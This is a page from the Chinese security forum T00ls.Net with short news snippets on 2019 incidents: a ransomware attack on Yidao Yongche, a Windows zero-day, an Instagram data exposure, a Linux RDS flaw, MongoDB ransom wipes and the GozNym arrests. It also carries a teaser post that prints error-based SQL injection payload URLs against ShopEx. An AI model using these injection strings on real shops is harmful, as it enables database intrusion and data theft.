易到用车服务器遭到连续攻击:攻击者索要巨额比特币
易到用车服务器今日遭到连续攻击。易到用车官方称,2019年5月26日凌晨,易到用车服务器遭到连续攻击,因此给用户使用带来严重的影响。攻击者索要巨额的比特币相要挟,攻击导致易到核心数据被加密,服务器宕机。“我们的相关技术人员正在努力抢修。我们严厉谴责这种不法行为,并已向北京网警中心报案,并保留一切法律途径追 ...
漏洞猎人对外公布Windows的第5个零日漏洞
一个昵称为SandboxEscaper的安全研究人员,公布了从去年8月以来的第5个零日漏洞。新的漏洞存在于Windows 10的任务调度器(Task Scheduler)中,将允许本地端骇客将一般权限扩张至管理权限。 由于连续公布Windows的零日漏洞,SandboxEscaper的Twitter帐号在去年12月底就被停更,迄今尚未恢复。但SandboxEscaper依然通过博 ...
跟随Facebook?4900万用户信息被黑客盗走
此前Facebook的用户信息泄露案闹得沸沸扬扬,创始人马克扎克伯格为此还上了法庭。现在国际知名社交App Instagram也被曝出泄露了4900万用户信息。一个由亚马逊托管的服务器上,可以看到4900万的Instagram用户数据信息,这些信息包括用户的性别、个人资料图片、粉丝数、验证的城市和国家位置,还包括了一些私人信息,比如邮件 ...
Linux 内核曝出 RDS 漏洞 影响 Red Hat , Ubuntu , Debiand 与 SuSE
如果您不习惯使用最新版本的Linux内核,那么现在可能是考虑升级的好时机。基于早于5.0.8的内核版本的系统在通过TCP实现RDS时已经发现一个缺陷。如果没有打补丁,该漏洞可能会使攻击者破坏系统。Red Hat,Ubuntu,Debian和SUSE都受到了这个漏洞的影响,并且这些发行方均已为其Linux发行版发布了安全建议。值得注意的是,“攻 ...
超 12,000 个 MongoDB 数据库被 Unrisllar 黑客组织删除
在过去三周内,超过12,000个不安全的MongoDB数据库被删除。黑客组织只留下一条消息:“联系我们以恢复数据”。此前虽然没有达到这种规模,但至少从2017年初开始,这些针对可公开访问的MongoDB数据库的攻击已经发生。黑客们使用BinaryEdge或Shodan搜索引擎来查找暴露的数据库服务器并删除它们。要想恢复服务,就得支付赎金。 ...
FBI 指控网络犯罪头目试图从全球 44000 台电脑中窃取 1 亿美元
美国联邦调查局(FBI)和全球执法合作伙伴周四上午称,一名策划了一项犯罪阴谋的网络黑客头目已被逮捕,该阴谋闯入了44000台电脑,可能窃取了数百万美元。欧洲警察组织和联邦调查局证实,亚历山大·科诺沃洛夫和他的同谋玛拉特·卡赞德吉因涉嫌参与所谓的Goznym犯罪网络而在格鲁吉亚受到起诉。美国还公开了一项起诉,指控10 ...
T00ls新年礼物之二:shopex通杀SQL注入两处
[url]http://www.x.cn/index.php?comment-822\'/[/url]**/and/**/\'1\'=\'1-ask-commentlist.html[url]http://www.x.com/comment-8967\'/[/url]**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/\'1-ask-commentlist.html[url]http://www.x.cn/index.php?comment-822\'/[/url]**/and/**/\'1\'=\'1-ask-commentlist.html[url]http://demo.x.com.cn/485/index.php ...
慕课网(imooc.com)某处csrf客户端请求伪造漏洞,可重置任意密码
根据《中华人民共和国网络安全法》,本站漏洞永不公开,若厂商想了解详情请咨询admin@t00ls.net!
T00ls.Net版权所有。T00ls所有原创文章未经管理团队许可,禁止一切形式的转载。
Copyright © 2008 - 2019 T00ls.Net All Rights Reserved.苏ICP备16024049号